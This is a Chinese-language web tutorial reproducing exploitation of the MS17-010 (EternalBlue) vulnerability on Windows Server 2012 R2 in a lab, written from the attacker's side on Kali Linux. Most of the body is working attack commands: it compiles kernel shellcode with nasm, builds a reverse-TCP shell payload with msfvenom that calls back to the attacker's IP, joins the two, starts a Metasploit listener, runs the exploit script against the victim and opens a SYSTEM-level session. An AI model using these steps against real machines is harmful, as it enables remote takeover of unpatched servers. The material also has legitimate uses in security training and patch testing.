<返回更多

Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

2019-12-26    
加入收藏

Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

 本文将复现MS17010漏洞在windows Server 2012 R2系统下的利用过程,通过使用msf渗透框架生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主机的系统进程中。

 

测试环境

kali linux 2017 x32(attacker)

Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

Windows Server 2012 R2(victim)

Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 


Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

准备工作


首先下载相关的PoC

下载eternalblue_kshellcode_x64.asm

下载eternalblue_exploit8.py

相关资源在此不显示,需要者请在评论区留言


操作步骤

1.编译汇编文件

nasm -f bin eternalblue_kshellcode_x64.asm
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

此命令在本目录下生成对应二进制文件eternalblue_kshellcode_x64

2.生成msf的payload

msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=192.168.254.128 LPORT=4444
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

-p 指定msf生成的payload的类型

-f payload的类型

-o 输出的payload的文件名

EXITFUNC 指定这个payload的退出函数

LHOST 本机IP,应使用ifconfig查看kali的IP

LPORT 本机端口,后续payload将连接kali的这个端口

3.组装汇编文件和payload为专用shellcode

cat eternalblue_kshellcode_x64 shell_msf.bin > reverse_shell.bin
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

reverse_shell.bin为生成的完整shellcode

注:这种组装方式的原理可以查看asm文件,最后一行有注释,后面是自定义的代码,那么拼接payload之后,payload代码将被执行

4.在msf上使用exploit/multi/handler模块

use exploit/multi/handler
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

5.设置相应的payload,与之前msfvenom命令生成的payload一定要相同

Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

6.设置相应的参数,一定要与msfvenom命令中的参数一致,否则会造成victim蓝屏,设置好之后启动监听

set EXITFUNC threadset lhost 192.168.254.128run
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

192.168.254.128是本次实验的kali系统IP,进行操作时应先使用ifconfig获取本机的IP

7.启动利用程序

Python eternalblue_exploit8.py 192.168.254.129 reverse_shell.bin
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

eternalblue_exploit8.py 利用程序的文件名

192.168.254.129 victim的IP

reverse_shell.bin shellcode文件

8.成功获取对方的session

利用程序显示done之后,msf会监听到一个session

使用以下方法查看已连接的session

sessions -i
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

9.连入对方机器

sessions -i 1
Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程

 

-i后面的参数为session的Id

此时获取的已经是system权限

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>